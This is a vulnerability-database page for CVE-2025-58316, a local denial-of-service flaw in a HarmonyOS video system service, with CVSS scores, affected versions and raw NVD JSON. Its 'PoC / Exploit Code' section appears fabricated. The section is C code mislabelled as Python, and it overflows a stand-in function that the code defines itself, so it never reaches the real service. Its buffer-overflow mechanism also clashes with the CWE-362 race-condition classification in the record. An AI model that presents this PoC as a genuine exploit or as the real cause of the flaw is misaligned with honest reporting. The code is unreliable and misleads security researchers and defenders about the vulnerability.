Security Vulnerability Report
中文
CVE-2025-58316 CVSS 7.3 HIGH

CVE-2025-58316

Published: 2025-11-28 03:16:00
Last Modified: 2025-12-02 02:30:13

Description

DoS vulnerability in the video-related system service module. Impact: Successful exploitation of this vulnerability may affect availability.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:o:huawei:harmonyos:5.0.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:huawei:harmonyos:5.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:huawei:harmonyos:6.0.0:*:*:*:*:*:*:* - VULNERABLE
华为消费者设备(视频系统服务模块) 受影响版本详见华为官方 bulletins/2025/11/

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-58316 PoC - Local DoS on Huawei Video Service Module // This PoC demonstrates triggering a denial of service condition // in the video-related system service module #include <stdio.h> #include <stdlib.h> #include <string.h> // Simulated vulnerable function in video service module void process_video_frame(unsigned char* frame_data, int length) { // Vulnerable code: missing proper bounds checking unsigned char buffer[1024]; memcpy(buffer, frame_data, length); // No length validation // Additional vulnerable processing... } // Trigger the vulnerability int trigger_dos() { // Craft malicious video frame with oversized data int oversized_length = 2048; // Exceeds buffer size unsigned char* malicious_frame = malloc(oversized_length); if (malicious_frame == NULL) { return -1; } memset(malicious_frame, 0xFF, oversized_length); // This will trigger the DoS condition process_video_frame(malicious_frame, oversized_length); free(malicious_frame); return 0; } int main() { printf("CVE-2025-58316 PoC - Triggering DoS...\n"); trigger_dos(); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58316", "sourceIdentifier": "[email protected]", "published": "2025-11-28T03:16:00.383", "lastModified": "2025-12-02T02:30:12.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DoS vulnerability in the video-related system service module.\nImpact: Successful exploitation of this vulnerability may affect availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:5.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "738D803A-C4CE-477B-BC89-CE47351C0A84"}, {"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E39DE6A6-CBE6-4086-93CD-113D1B3BA730"}, {"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:6.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0EBE30DD-E146-4A6A-BE68-DEF9D4D0B2A8"}]}]}], "references": [{"url": "https://consumer.huawei.com/en/support/bulletin/2025/11/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}